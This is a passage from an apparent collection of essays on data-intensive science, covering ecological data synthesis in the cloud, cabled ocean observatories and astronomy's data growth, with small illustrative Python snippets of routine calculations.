Applications science is therefore integrative; it couples understanding of physical phenomena and research into the ways that people and organizations can use better knowledge to make decisions. The public as a whole can also become an important contributor to localized Earth observation, augmenting our limited satellite and sensor networks through devices as simple as mobile phone cameras. The ability to leverage this emerging data-gathering capability will be an important challenge for the new phase of environmental science. The security and prosperity of nearly 7 billion people depend increasingly on our ability to gather and apply information about the world around us. Basic environmental science has established an excellent starting point. We must now develop this into a robust science of environmental applications.

References

[1] National Research Council, Earth Observations from Space: The First 50 Years of Scientific Achievement. Washington, D.C.: National Academies Press, 2007.
[2] R. DelVecchio, UC Berkeley: Panel looks at control of emissions, S.F. Chronicle, March 22, 2007.
[3] T. P. Barnett, J. C. Adam, and D. P. Lettenmaier, Potential impacts of a warming climate on water availability in snow-dominated regions, Nature, vol. 438, pp. 303-309, 2005, doi: 10.1038/nature04141.
[4] P. C. D. Milly, J. Betancourt, M. Falkenmark, R. M. Hirsch, Z. W. Kundzewicz, D. P. Lettenmaier, and R. J. Stouffer, Stationarity is dead: whither water management? Science, vol. 319, pp. 573-574, 2008, doi: 10.1126/science.1151915.
[5] R. C. Bales, N. P. Molotch, T. H. Painter, M. D. Dettinger, R. Rice, and J. Dozier, Mountain hydrology of the western United States, Water Resour. Res., vol. 42, W08432, 2006, doi: 10.1029/2005WR004387.
[6] J. D. Lundquist and M. D. Dettinger, How snowpack heterogeneity affects diurnal streamflow timing, Water Resour. Res., vol. 41, W05007, 2005, doi: 10.1029/2004WR003649.
[7] D. W. Cline, R. C. Bales, and J. Dozier, Estimating the spatial distribution of snow in mountain basins using remote sensing and energy balance modeling, Water Resour. Res., vol. 34, pp. 1275-1285, 1998, doi: 10.1029/97WR03755.
[8] N. P. Molotch and R. C. Bales, Scaling snow observations from the point to the grid element: implications for observation network design, Water Resour. Res., vol. 41, W11421, 2005, doi: 10.1029/2005WR004229.
[9] C. L. Tague and L. E. Band, RHESSys: regional hydro-ecologic simulation system, an object-oriented approach to spatially distributed modeling of carbon, water, and nutrient cycling, Earth Int., vol. 19, pp. 1-42, 2004.
[10] T. H. Painter, K. Rittger, C. McKenzie, R. E. Davis, and J. Dozier, Retrieval of subpixel snow-covered area, grain size, and albedo from MODIS, Remote Sens. Environ., vol. 113, pp. 868-879, 2009, doi: 10.1016/j.rse.2009.01.001.

EARTH AND ENVIRONMENT

James R. Hunt, University of California, Berkeley, and the Berkeley Water Center
Dennis D. Baldocchi, University of California, Berkeley
Catharine van Ingen, Microsoft Research

Ecology is the study of life and its interactions with the physical environment. Because climate change requires rapid adaptation, new data analysis tools are essential to quantify those changes in the midst of high natural variability.
Ecology is a science in which studies have been performed primarily by small groups of individuals, with data recorded and stored in notebooks. But large synthesis studies are now being attempted by collaborations involving hundreds of scientists. These larger efforts are essential because of two developments: one in how science is done and the other in the resource management questions being asked. While collaboration synthesis studies are still nascent, their ever-increasing importance is clear. Computational support is integral to these collaborations and key to the scientific process.

The global climate and the Earth's landscape are changing, and scientists must quantify significant linkages between atmospheric, oceanic, and terrestrial processes to properly study the phenomena. For example, scientists are now asking how climate fluctuations in temperature, precipitation, solar radiation, length of growing season, and extreme weather events such as droughts affect the net carbon exchange between vegetation and the atmosphere. This question spans many Earth science disciplines with their respective data, models, and assumptions.

These changes require a new approach to resolving resource management questions. In the short run of the next few decades, ecosystems cannot be restored to their former status. For example, with a warming climate on the West Coast of the United States, can historical data from coastal watersheds in southern California be used to predict the fish habitats of northern California coastal watersheds? Similarly, what can remote sensing tell us about deforestation? Addressing these challenges requires a synthesis of data and models that spans length scales from the very local (river pools) to the global (oceanic circulations) and spans time scales from a few tens of milliseconds to centuries.

An Example of Ecological Synthesis

Figure 1 shows a simple science mashup example of a synthesis study. The graph compares annual runoff from relatively small watersheds in the foothills of the Sierra Nevada in California to local annual precipitation over multiple years. Annual runoff values were obtained from the U.S. Geological Survey (USGS) for three of the gauging stations along Dry Creek and the Schubert University of California experimental field site.1 Long-term precipitation records from nearby rain gauges were obtained from the National Climatic Data Center.2 The precipitation that does not run off undergoes evapotranspiration (ET) that is largely dominated by watershed vegetation. In these watersheds, a single value of 400 mm is observed over all years of data. A similar value of annual ET was obtained by independent measurement from atmospheric sensors deployed over an oak savannah ecosystem at the AmeriFlux Tonzi Ranch tower.3 This synthesis of historical data defines a watershed model appropriate for historical conditions and provides a reference frame for addressing climate change effects in a highly variable system.

FIGURE 1. Simple annual water balance to estimate evapotranspiration in Sierra Nevada foothill watersheds: annual runoff versus annual precipitation, in millimeters, for the Schubert site (1.03 sq. km) and three Dry Creek stations (181, 689, and 829 sq. km). The dashed line represents an annual ET of 400 mm.
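The arithmetic behind Figure 1 is a one-line water balance: annual evapotranspiration is roughly annual precipitation minus annual runoff. The small sketch below restates that calculation for a few invented year values (they are not the USGS or National Climatic Data Center records themselves), simply to show how an ET near 400 mm emerges regardless of how wet the year is.

# Annual water balance for a watershed: ET ~= precipitation - runoff (all in mm).
# The (precipitation, runoff) pairs are illustrative, not measured values.
years = {
    2001: (600, 190),
    2002: (820, 410),
    2003: (450, 60),
}

for year, (precip_mm, runoff_mm) in sorted(years.items()):
    et_mm = precip_mm - runoff_mm
    print(f"{year}: ET ~ {et_mm} mm")

# In watersheds that behave like those in Figure 1, ET clusters near 400 mm
# whether the year is wet or dry; the excess precipitation leaves as runoff.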
The Coming Flood of Ecological Data

These new synthesis studies are enabled by the confluence of low-cost sensors, remote sensing, Internet connectivity, and commodity computing. Sensor deployments by research groups are shifting from short campaigns to long-term monitoring with finer-scale and more diverse instruments. Satellites give global coverage, particularly to remote or harsh regions where field research is hampered by physical and political logistics. Internet connectivity is enabling data sharing across organizations and disciplines. The result of these first three factors is a data flood. Commodity computing provides part of the solution, by allowing the flood to be paired with models that incorporate different physical and biological processes and allowing different models to be linked to span the length and time scales of interest.

The flood of ecological data and ecological science synthesis presents unique computing infrastructure challenges and new opportunities. Unlike sciences such as physics or astronomy, in which detectors are shared, in ecological science data are generated by a wide variety of groups using a wide variety of sampling or simulation methodologies and data standards. As shown earlier in Figure 1, the use of published data from two different sources was essential to obtain evapotranspiration. This synthesis required digital access to long records, separate processing of those datasets to arrive at ET, and finally verification with independent flux tower measurements. Other synthetic activities will require access to evolving resources from government organizations such as NASA or USGS, science collaborations such as the National Ecological Observatory Network and the WATERS Network,4 individual university science research groups such as Life Under Your Feet,5 and even citizen scientist groups such as the Community Collaborative Rain, Hail and Snow Network6 and the USA National Phenology Network.7

While the bulk of the data start out as digital, originating from the field sensor, radar, or satellite, the historic data and field data, which are critical for the science, are being digitized. The latter data are not always evenly spaced time series; they can include the date of leaf budding, or aerial imagery at different wavelengths and resolutions to assess quantities throughout the watershed such as soil moisture, vegetation, and land use. Deriving science variables from remote sensing remains an active area of research; as such, hard-won field measurements often form the ground truth necessary to develop conversion algorithms. Citizen science field observations such as plant species, plant growth (budding dates or tree ring growth, for example), and fish and bird counts are becoming increasingly important. Integrating such diverse information is an ever-increasing challenge to science analysis.

Navigating the Ecological Data Flood

The first step in any ecological science analysis is data discovery and harmonization. Larger datasets are discoverable today; smaller and historic datasets are often found by word of mouth. Because of the diversity of data publishers, no single reporting protocol exists. Unit conversions, geospatial reprojections, and time/length scale regularizations are a way of life. Science data catalog portals such as SciScope8 and Web services with common data models such as those from the Open Geospatial Consortium9 are evolving. Integral to these science data search portals is knowledge of geospatial features and variable namespace mediation. The first enables searches across study watersheds or geological regions as well as simple polygon bounding boxes. The second enables searches to include multiple search terms, such as "rainfall," "precipitation," and "precip," when searching across data repositories with different naming conventions. A new generation of metadata registries that use semantic Web technologies will enable richer searches as well as automated name and unit conversions. The combination of both developments will enable science data searches such as "Find me the daily river flow and suspended sediment discharge data from all watersheds in Washington State with more than 30 inches of annual rainfall."
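As a toy illustration of the name mediation and unit conversion just described (it does not reproduce the behavior of SciScope, the OGC services, or any real registry, and the synonym and unit tables are invented), a harmonization layer for precipitation records might look like the following sketch.

# Toy harmonization layer: map repository-specific variable names onto a
# common term and convert units. The synonym and unit tables are invented.
SYNONYMS = {
    "rainfall": "precipitation",
    "precip": "precipitation",
    "precipitation": "precipitation",
}

TO_MILLIMETERS = {
    "mm": 1.0,
    "cm": 10.0,
    "in": 25.4,      # inches to millimeters
}

def harmonize(record):
    """record = (variable_name, value, unit) as published by one repository."""
    name, value, unit = record
    common_name = SYNONYMS.get(name.lower(), name.lower())
    value_mm = value * TO_MILLIMETERS[unit]
    return common_name, value_mm, "mm"

if __name__ == "__main__":
    published = [("rainfall", 30.0, "in"), ("precip", 820.0, "mm")]
    for rec in published:
        print(harmonize(rec))

Mediation of this kind is what allows a single query to span repositories that publish "rainfall" in inches alongside others that publish "precip" in millimeters.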
Moving Ecological Synthesis into the Cloud

Large synthesis datasets are also leading to a migration from the desktop to cloud computing. Most ecological science datasets have been collections of files. An example is the Fluxnet LaThuile synthesis dataset, containing 966 site-years of sensor data from 253 sites around the world. The data for each site-year is published as a simple comma-separated or MATLAB-ready file of either daily aggregates or half-hourly aggregates. Most of the scientists download some or all of the files and then perform analyses locally. Other scientists are using an alternative cloud service that links MATLAB on the desktop to a SQL Server Analysis Services data cube in the cloud. The data appears local, but the scientists need not be bothered with the individual file handling. Local download and manipulation of the remote sensing data that would complement that sensor data are not practical for many scientists. A cloud analysis now in progress using both to compute changes in evapotranspiration across the United States over the last 10 years will download 3 terabytes of imagery and use 4,000 CPU hours of processing to generate less than 100 MB of results. Doing the analysis off the desktop leverages the higher bandwidth, large temporary storage capacity, and compute farm available in the cloud.

Synthesis studies also create a need for collaborative tools in the cloud. Science data has value for data-owner scientists in the form of publications, grants, reputation, and students. Sharing data with others should increase rather than decrease that value. Determining the appropriate citations, acknowledgment, and/or coauthorship policies for synthesis papers remains an open area of discussion in larger collaborations such as Fluxnet10 and the North American Carbon Program.11 Journal space and authorship limitations are an important concern in these discussions. Addressing the ethical question of what it means to be a co-author is essential: Is contributing data sufficient when that contribution is based on significant intellectual and physical effort? Once such policies are agreed upon, simple collaborative tools in the cloud can greatly reduce the logistics required to publish a paper, provide a location for the discovery of collaboration authors, and enable researchers to track how their data are used.

How Cyberinfrastructure Is Changing Ecological Science

The flood of ecological data will break down scientific silos and enable a new generation of scientific research. The goal of understanding the impacts of climate change is driving research that spans disciplines such as plant physiology, soil science, meteorology, oceanography, hydrology, and fluvial geomorphology.
Bridging the diverse length and time scales involved will require a collection of cooperating models. Synthesizing the field observations with those model results at key length and time scales is crucial to the development and validation of such models. The diversity of ecological dataset size, dataset semantics, and dataset publisher concerns poses a cyberinfrastructure challenge that will be addressed over the next several years. Synthesis science drives not only direct conversations but also virtual ones between scientists of different backgrounds. Advances in metadata representation can break down the semantic and syntactic barriers to those conversations. Data visualizations that range from our simple mashup to more complex virtual worlds are also key elements in those conversations. Cloud access to discoverable, distributed datasets and, perhaps even more important, enabling cloud data analyses near the more massive datasets will enable a new generation of cross-discipline science.

EARTH AND ENVIRONMENT

The global ocean belongs to all of us by virtue of its mobile nature. The oceans may be viewed as the common heritage of humankind, the responsibility and life support of us all.

Ocean Complexity

Our challenge is to optimize the benefits and mitigate the risks of living on a planet dominated by two major energy sources: sunlight driving the atmosphere and much of the upper ocean, and internal heat driving plate tectonics and portions of the lower ocean. For more than 4 billion years, the global ocean has responded to and integrated the impacts of these two powerful driving forces as the Earth, the oceans, the atmosphere, and life have co-evolved. As a consequence, our oceans have had a long, complicated history, producing today's immensely complex system in which thousands of physical, chemical, and biological processes continually interact over many scales of time and space as the oceans maintain our planetary-scale ecological comfort zone. Figure 1 captures a small fraction of this complexity, which is constantly driven by energy from above and below. Deeper understanding of this global life-support system requires entirely novel research approaches that will allow broad spectrum, interactive ocean processes to be studied simultaneously and interactively by many scientists: approaches that enable continuous in situ examination of linkages among many processes in a coherent time and space framework. Implementing these powerful new approaches is both the challenge and the vision of next-generation ocean science.

Historical Perspective

For thousands of years, humans have gone to sea in ships to escape, to conquer, to trade, and to explore. Between October 1957 and January 1960, we launched the first Earth-orbiting satellite and dove to the deepest part of the ocean. Ships, satellites, and submarines have been the mainstays of spatially focused oceanographic research and exploration for the past 50 years. We are now poised on the next threshold of technological breakthrough that will advance oceanic discovery; this time, exploration will be focused on the time domain and interacting processes. This new era will draw deeply on the emergence, and convergence, of many rapidly evolving new technologies. These changes are setting the scene for what Marcel Proust called "[t]he real voyage of discovery, [which] lies not in seeking new landscapes, but in having new eyes."
In many ways, this vision of next-generation oceanographic research and education involves utilizing a wide range of innovative technologies to simultaneously and continuously see, or sense, many different processes operating throughout entire volumes of the ocean from a perspective within the ocean. Some of these same capabilities will enable remote in situ detection of critical changes taking place within selected ocean volumes. Rapid reconfiguration of key sensor arrays linked to the Internet via submarine electro-optical cables will allow us to capture, image, document, and measure energetic and previously inaccessible phenomena such as erupting volcanoes, major migration patterns, large submarine slumps, big earthquakes, giant storms, and a host of other complex phenomena that have been largely inaccessible to scientific study.

FIGURE 1. Two primary energy sources powerfully influence the ocean basins: sunlight and its radiant energy, and internal heat with its convective and conductive input. Understanding the complexity of the oceans requires documenting and quantifying, in a well-defined time-space framework over decades, myriad processes that are constantly changing and interacting with one another. Illustration designed by John Delaney and Mark Stoermer; created by the Center for Environmental Visualization (CEV) for the NEPTUNE Program.

The Fourth Paradigm

The ocean has been chronically under-sampled for as long as humans have been trying to characterize its innate complexity. In a very real sense, the current suite of computationally intensive numerical/theoretical models of ocean behavior has outstripped the requisite level of actual data necessary to ground those models in reality. As a consequence, we have been unable to even come close to useful predictive models of the real behavior of the oceans. Only by quantifying powerful episodic events, like giant storms and erupting volcanoes, within the context of longer-term decadal changes can we begin to approach dependable predictive models of ocean behavior. Over time, as the adaptive models are progressively refined by continual comparison with actual data flowing from real systems, we slowly gain the ability to predict the future behavior of these immensely complex natural systems.

To achieve that goal, we must take steps to fundamentally change the way we approach oceanography. This path has several crucial steps. We must be able to document conditions and measure fluxes within the volume of the ocean, simultaneously and in real time, over many scales of time and space, regardless of the depth, energy, mobility, or complexity of the processes involved. These measurements must be made using colocated arrays of many sensor types, operated by many investigators over periods of decades to centuries. And the data must be collected, archived, visualized, and compared immediately to model simulations that are explicitly configured to address complexity at scales comparable in time and space to the actual measurements.
This approach offers three major advantages: (1) The models must progressively emulate the measured reality through constant comparison with data to capture the real behavior of the oceans in model space to move toward more predictive 30 simulations; (2) When the models and the data disagree, assuming the data are valid, we must immediately adapt at-sea sensor-robot systems to fully characterize the events that are unfolding because they obviously offer new insights into the complexities we seek to capture in the failed models; (3) By making and archiving all observations and measurements in coherently indexed time and space frameworks, we can allow many investigators (even those not involved in the data collection) to examine correlations among any number of selected phenomena during, or long after, the time that the events or processes occur. If the archived data are immediately and widely available via the Internet, the potential for discovery rises substantially because of the growing number of potential investigators who can explore a rapidly expanding spectrum of parameter space. For scientists operating in this data-intensive environment, there will be a need for development of a new suite of scientific workflow products that can facilitate the archiving, assimilation, visualization, modeling, and interpretation of the information about all scientific systems of interest. Several workshop reports that offer examples of these workflow products are available in the open literature [1, 2]. Emergence and Convergence Ocean science is becoming the beneficiary of a host of powerful emergent technologies driven by many communities that are entirely external to the world of ocean researchthey include, but are not limited to, nanotechnology, biotechnology, information technology, computational modeling, imaging technologies, and robotics. More powerful yet will be the progressive convergence of these enabling capabilities as they are adapted to conduct sophisticated remote marine operations in novel ways by combining innovative technologies into appropriate investigative or experimental systems. For example, computer-enabled support activities must include massive data storage systems, cloud computing, scientific workflow, advanced visualization displays, and handheld supercomputing. Instead of batteries and satellites being used to operate remote installations, electrical power and the vast bandwidth of optical fiber will be used to transform the kinds of scientific and educational activities that can be conducted within the ocean. Adaptation of industry-standard electrooptical cables for use in oceanographic research can fundamentally change the nature of human telepresence throughout the full volume of the oceans by introducing unprecedented but routinely available power and bandwidth into ocean space. High-resolution optical and acoustic sensing will be part of the broader technology 31 of ocean imaging systems. These approaches will include routine use of highdefinition video, in stereo if needed, as well as high-resolution sonar, acoustic lenses, laser imaging, and volumetric sampling. Advanced sensor technologies will include chemical sensing using remote, and mobile, mass spectrometers and gas chromatographs, eco-genomic analysis, and adaptive sampling techniques. An Integrated Approach After decades of planning [3, 4], the U.S. 
An Integrated Approach

After decades of planning [3, 4], the U.S. National Science Foundation (NSF) is on the verge of investing more than US$600 million over 6 years in the construction and early operation of an innovative infrastructure known as the Ocean Observatories Initiative (OOI) [4]. The design life of the program is 25 years. In addition to making much-needed high-latitude and coastal measurements supported by relatively low-bandwidth satellite communications systems, this initiative will include a transformative undertaking to implement electro-optically cabled observing systems in the northeast Pacific Ocean [5-7] off the coasts of Washington, Oregon, and British Columbia, as illustrated in Figure 2. These interactive, distributed sensor networks in the U.S. and Canada will create a large-aperture natural laboratory for conducting a wide range of long-term innovative experiments within the ocean volume using real-time control over the entire laboratory system. Extending unprecedented power and bandwidth to a wide range of interactive sensors, instruments, and robots distributed throughout the ocean water, at the air-sea interface, on the seafloor, and below the seafloor within drill holes will empower next-generation creativity and exploration of the time domain among a broad spectrum of investigators.

The University of Washington leads the cabled component of the NSF initiative, known as the Regional Scale Nodes (formerly known, and funded, as NEPTUNE); the University of Victoria leads the effort in Canada, known as NEPTUNE Canada. The two approaches were conceived jointly in 2000 as a collaborative U.S.-Canadian effort. The Consortium for Ocean Leadership in Washington, D.C., is managing and integrating the entire OOI system for NSF. Woods Hole Oceanographic Institution and the University of California, San Diego, are responsible for overseeing the Coastal-Global and CyberInfrastructure portions of the program, respectively. Oregon State University and Scripps Institution of Oceanography are participants in the Coastal-Global portion of the OOI.

FIGURE 2. A portion of the OOI focuses on the dynamic behavior of the Juan de Fuca Plate and the energetic processes operating in the overlying ocean and atmosphere. Recent modifications in the Regional Scale Nodes (RSN) have focused on delivery of the elements shown in red, and the pink components are future expansion. The inset shows the crest of Axial Seamount along the active Juan de Fuca Ridge. Each square block site will provide unprecedented electrical power and bandwidth available for research and education. Many of the processes shown in Figure 1 can be examined at the sites here. Image created by CEV for OOI-RSN.

The cabled ocean observatory approach will revolutionize ocean science by providing interactive access to ocean data and instruments 24/7/365 over two to three decades. More than 1,200 kilometers of electro-optical submarine cable will deliver many tens of kilowatts of power to seafloor nodes, where instruments that might spread over a 50 km radius for each node will be plugged in directly or via secondary extension cables. The primary cable will provide between 2.5 and 10 gigabit/sec bandwidth connectivity between land and a growing number of fixed sensor packages and mobile sensor platforms. We expect that a host of novel approaches to oceanography will evolve based on the availability of in situ power and bandwidth.
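A back-of-envelope calculation (added here for illustration, not a figure from the OOI design documents) gives a sense of what that bandwidth implies for data volume; the assumed sustained rates are illustrative only.

# Back-of-envelope: sustained data volume for a cabled observatory.
# Assumption (not an OOI specification): instruments use the listed average
# rates out of the 2.5-10 Gbit/s the primary cable can provide.
SECONDS_PER_YEAR = 365 * 24 * 3600

def petabytes_per_year(average_gbit_per_s):
    bytes_per_year = average_gbit_per_s * 1e9 / 8 * SECONDS_PER_YEAR
    return bytes_per_year / 1e15

for rate in (1, 2.5, 10):
    print(f"{rate:>4} Gbit/s sustained ~ {petabytes_per_year(rate):.1f} PB/year")

Even a modest fraction of the cable's capacity, sustained year-round, lands in the petabyte-per-year range that the common cyberinfrastructure described below is expected to manage.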
A major benefit will be the real-time data return and command-control of fleets of remotely operated vehicles (ROVs) and autonomous underwater vehicles (AUVs). The infrastructure will be adaptable, expandable, and exportable to interested users. Data policy for the OOI calls for all information to be made available to all interested users via the Internet (with the exception of information bearing on national security). Hardwired to the Internet, the cabled observatories will provide scientists, students, educators, and the public with virtual access to remarkable parts of our planet that are rarely visited by humans. In effect, the Internet will be extended to the seafloor, with the ability to interact with a host of instruments, including HD video live from the many environments within the oceans, as illustrated in Figure 3.

FIGURE 3. Next-generation scientists or citizens. This virtual picture shows a deep ocean octopus, known as Grimpoteuthis, and a portion of a submarine hydrothermal system on the Juan de Fuca Ridge. Such real-time displays of 3-D HD video will be routine within 5 years. Graphic designed by Mark Stoermer and created by CEV for NEPTUNE in 2005.

The cabled observatory systems will be able to capture processes at the scale of the tectonic plate, mesoscale oceanic eddies, or even smaller scales. Research into representative activities responsible for climate change, major biological productivity at the base of the food chain, or encroaching ocean acidification (to name a few) will be readily conducted with this new infrastructure. Novel studies of mid-ocean spreading centers, transform faults, and especially processes in the subduction zone at the base of the continental slope, which may trigger massive earthquakes in the Pacific Northwest, will also be addressable using the same investment in the same cabled infrastructure.

This interactive ocean laboratory will be enabled by a common cyberinfrastructure that integrates multiple observatories, thousands of instruments, tens of thousands of users, and petabytes of data. The goals of the cabled ocean observatory can be achieved only if the at-sea portion is complemented by state-of-the-art information technology infrastructure resulting from a strong collaborative effort between computer scientists and ocean scientists. Such collaboration will allow scientists to interact with the ocean through real-time command and control of sensors; provide models with a continuous data feed; automate data quality control and calibration; and support novel approaches to data management, analysis, and visualization.

What Is Possible?

Figure 4 depicts some of the potentially transformative capabilities that could emerge in ocean science by 2020. In the long term, a key element of the introduction of unprecedented power and bandwidth for use within the ocean basins will be the potential for bold and integrative designs and developments that enhance our understanding of, and perhaps our ability to predict, the behavior of Earth, ocean, and atmosphere interactions and their bearing on a sustainable planetary habitat.

Conclusion

The cabled ocean observatory merges dramatic technological advancements in sensor technologies, robotic systems, high-speed communication, eco-genomics, and nanotechnology with ocean observatory infrastructure in ways that will substantially transform the approaches that scientists, educators, technologists, and policymakers take in interacting with the dynamic global ocean.
Over the coming decades, most nations will implement systems of this type in the offshore extensions of their territorial seas. As these systems become more sophisticated and data become routinely available via the Internet, the Internet will emerge as the most powerful oceanographic research tool on the planet. In this fashion, the legacy of Jim Gray will continue to grow as we learn to discover truths and insights within the data we already have in the can. While the cabled observatory will have profound ramifications for the manner in which scientists, engineers, and educators conduct their professional activities, the most far-reaching effects may be a significant shift in public attitudes toward the oceans as well as toward the scientific process.

FIGURE 4. Some of the transformative developments that could become routine within 5 years with the added power of a cabled support system. The top image shows miniaturized genomic analysis systems adapted from land laboratories to the ocean to allow scientists, with the flip of a switch in their lab hundreds of miles away, to sample ambient flow remotely and run in situ gene sequencing operations within the ocean. The data can be made available on the Internet within minutes of the decision to sample microbes in an erupting submarine volcanic plume or a seasonally driven phytoplankton bloom. The lower part shows a conceptual illustration of an entire remote analytical-biological laboratory on the seafloor that allows a variety of key measurements or dissections to be made in situ using stereo high-definition video to guide high-precision remote manipulations. Scientific concepts by Ginger Armbrust and John Delaney; graphic design by Mark Stoermer for CEV.

The real-time data and high-speed communications inherent in cabled remote observing systems will also open entirely new avenues for the public to interact with the natural world. In the final analysis, having predictive models of how the ocean functions, based on decades of refining sophisticated computer simulations against high-quality observations from distributed sensor networks, will form the basis for learning to manage, or at least adapt to, the most powerful climate-modulating system on the planet: the global ocean.

Acknowledgments

We gratefully acknowledge the significant influence of Jim Gray, who unflinchingly stated that this cabled ocean observing approach using high-bandwidth and real-time data flow would be integral to human progress and understanding of the world we live in. We are also pleased to acknowledge the support of the University of Washington, the National Science Foundation, the Consortium for Ocean Leadership, and the Microsoft External Research group for technical collaboration and financial support. NSF and the National Oceanographic Partnership Program were particularly supportive of the early development of the NEPTUNE concept from 1998 to 2005, through grants to J. R. Delaney. Deborah Kelley, Nancy Penrose, and Mark Stoermer contributed significantly to the preparation of this manuscript and to conversations bearing on the content.

References

[1] Project Trident: A Scientific Workflow Workbench Brings Clarity to Data.
[2] Two URLs for the NSF Workshop on Challenges of Scientific Workflows.
[3] National Research Council of the National Academies, Enabling Ocean Research in the 21st Century: Implementation of a Network of Ocean Observatories. Washington, D.C.: National Academies Press, 2003, p. 220.
[4] Ocean Observatories Initiative (OOI) Scientific Objectives and Network Design: A Closer Look, 2007. Ocean Leadership Web site for the Ocean Observatories Initiative: programs-and-partnerships/ocean-observing/ooi.
[5] J. R. Delaney, F. N. Spiess, S. C. Solomon, R. Hessler, J. L. Karsten, J. A. Baross, R. T. Holcomb, D. Norton, R. E. McDuff, F. L. Sayles, J. Whitehead, D. Abbott, and L. Olson, Scientific rationale for establishing long-term ocean bottom observatory/laboratory systems, in Marine Minerals: Resource Assessment Strategies, P. G. Teleki, M. R. Dobson, J. R. Moor, and U. von Stackelberg, Eds., 1987, pp. 389–411.
[6] J. R. Delaney, G. R. Heath, A. D. Chave, B. M. Howe, and H. Kirkham, NEPTUNE: Real-time ocean and earth sciences at the scale of a tectonic plate, Oceanography, vol. 13, pp. 71–83, 2000, doi: 10.1109/OCEANS.2001.968033.
[7] A. D. Chave, B. St. Arnaud, M. Abbott, J. R. Delaney, R. Johnson, E. Lazowska, A. R. Maffei, J. A. Orcutt, and L. Smarr, A management concept for ocean observatories based on web services, Proc. Oceans '04/Techno-Ocean '04, Kobe, Japan, Nov. 2004, p. 7, doi: 10.1109/OCEANS.2004.1406486.

EARTH AND ENVIRONMENT

[...] to data falling from the sky. But our relatively newfound ability to store the sky's [...]

Trends in Data Growth

Astronomy has a history of data collection stretching back at least to Stonehenge more than three millennia ago. Over time, the format of the information recorded by astronomers has changed, from carvings in stone to written records and hand-drawn illustrations to photographs to digital media. While the telescope (c. 1600) and the opening up of the electromagnetic spectrum beyond wavelengths visible to the human eye (c. 1940) led to qualitative changes in the nature of astronomical investigations, they did not increase the volume of collected data nearly as much as did the advent of the Digital Age. Charge-coupled devices (CCDs), which came into widespread use by the 1980s, and equivalent detectors at non-optical wavelengths became much more efficient than traditional analog media (such as photographic plates). The resulting rise in the rate of photon collection caused the ongoing (and potentially perpetually accelerating) increase in data available to astronomers. The increasing capabilities and plummeting price of the digital devices used in signal processing, data analysis, and data storage, combined with the expansion of the World Wide Web, transformed astronomy from an observational science into a digital and computational science. For example, the Large Synoptic Survey Telescope (LSST), coming within the decade, will produce more data in its first year of operation (1.28 petabytes) than any other telescope in history by a significant margin. The LSST will accomplish this feat by using very sensitive CCDs with huge numbers of pixels on a relatively large telescope with very fast optics (f/1.234) and a wide field of view (9.6 square degrees), and by taking a series of many shorter exposures (rather than the traditional longer exposures) that can be used to study the temporal behavior of astronomical sources. And while the LSST, Pan-STARRS, and other coming astronomical megaprojects (many at non-optical wavelengths) will produce huge datasets covering the whole sky, other groups and individuals will continue to add their own smaller, potentially more targeted, datasets.
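To get a feel for what a figure like 1.28 petabytes in a year implies at the telescope, here is a back-of-envelope sketch. Only the 1.28 PB figure comes from the text above; the camera size and pixel depth are assumed values for illustration, not specifications drawn from this article.

    # Rough implication of "1.28 PB in the first year" for nightly operations.
    PETABYTE = 1e15

    first_year_bytes = 1.28 * PETABYTE   # figure quoted in the text
    nights_per_year = 365                # assume observing every night
    pixels_per_image = 3.2e9             # assumed multi-gigapixel camera
    bytes_per_pixel = 2                  # assumed 16-bit raw pixels

    nightly_bytes = first_year_bytes / nights_per_year
    images_per_night = nightly_bytes / (pixels_per_image * bytes_per_pixel)

    print(f"~{nightly_bytes / 1e12:.1f} TB per night")        # ~3.5 TB
    print(f"~{images_per_night:.0f} full-frame images per night")  # a few hundred

Whatever the exact parameters, the point stands: every clear night delivers terabytes that no human will ever inspect image by image.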
For the remainder of this article, we will assume that the challenge of managing this explosive growth in data will be solved (likely through the clever use of cloud storage and novel data structures), and we will focus instead on how to offer better tools and novel technical and social analytics that will let us learn more about our universe. A number of emerging trends can help us find the needles in haystacks of data available over the Internet, including crowdsourcing, democratization of access via new browsing technologies, and growing computational power.

Crowdsourcing

The Sloan Digital Sky Survey was undertaken to image, and measure spectra for, millions of galaxies. Most of the galaxy images had never been viewed by a human because they were automatically extracted from wide-field images reduced in an automated pipeline. To test a claim that more galaxies rotate in an anticlockwise direction than clockwise, the Sloan team used custom code to create a Web page that served up pictures of galaxies to members of the public willing to play the online Galaxy Zoo game, which consists primarily of classifying the handedness of the galaxies. Clever algorithms within the Zoo serve the same galaxy to multiple users as a reference benchmark and to check up on players to see how accurate they are. The results from the first year's aggregated classifications of galaxies by the public proved to be just as accurate as those done by astronomers. More than 50 million classifications of a million galaxies were done by the public in the first year, and the claim about right/left-handed preference was ultimately refuted. Meanwhile, Hanny van Arkel, a schoolteacher in Holland, found a galaxy that is now the bluest known galaxy in the universe. It has come under intense scrutiny by major telescopes, including the Very Large Array (VLA) radio telescope, and will soon be scrutinized by the Hubble Space Telescope.

Democratizing Access via New Browsing Technologies

The time needed to acquire data from any astronomical object increases at least as quickly as the square of the distance to that object, so any service that can accumulate custom ensembles of already captured images and data effectively brings the night sky closer. The use of archived online data stored in a data cloud is facilitated by new software tools, such as Microsoft's WorldWide Telescope (WWT), which provide intuitive access to images of the night sky that have taken astronomers thousands and thousands of hours of telescope time to acquire. Using WWT (shown in Figure 1 on the next page), anyone can pan and zoom around the sky, at wavelengths from X-ray through radio, and anyone can navigate through a three-dimensional model of the Universe constructed from real observations, just to see what's there. Anyone can notice an unusual correspondence between features at multiple wavelengths at some position in the sky and click right through to all the published journal articles that discuss that position. Anyone can hook up a telescope to the computer running WWT and overlay live, new images on top of online images of the same piece of sky at virtually any wavelength. Anyone can be guided in their explorations via narrated tours produced by WWT users. As more and more tours are produced, WWT will become a true sky browser, with the sky as the substrate for conversations about the universe. Explorers will navigate along paths that intersect at objects of common interest, linking ideas and individuals.
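As a concrete illustration of the aggregation that the Galaxy Zoo approach described above relies on, here is a minimal sketch: an accuracy-weighted vote over multiple classifications of the same object, where each player's weight comes from how well they did on benchmark galaxies. The data, names, and weighting scheme are hypothetical, not the project's actual algorithm.

    from collections import defaultdict

    # Hypothetical classifications: galaxy_id -> list of (user, label) votes.
    votes = {
        "G1": [("ann", "clockwise"), ("bob", "anticlockwise"), ("cat", "clockwise")],
        "G2": [("ann", "anticlockwise"), ("bob", "anticlockwise"), ("cat", "clockwise")],
    }

    # Hypothetical per-user accuracy, estimated from benchmark galaxies
    # whose classification is already well established.
    user_accuracy = {"ann": 0.9, "bob": 0.6, "cat": 0.8}

    def consensus(galaxy_votes):
        """Accuracy-weighted vote: each label counts in proportion to the
        accuracy of the users who chose it."""
        weight = defaultdict(float)
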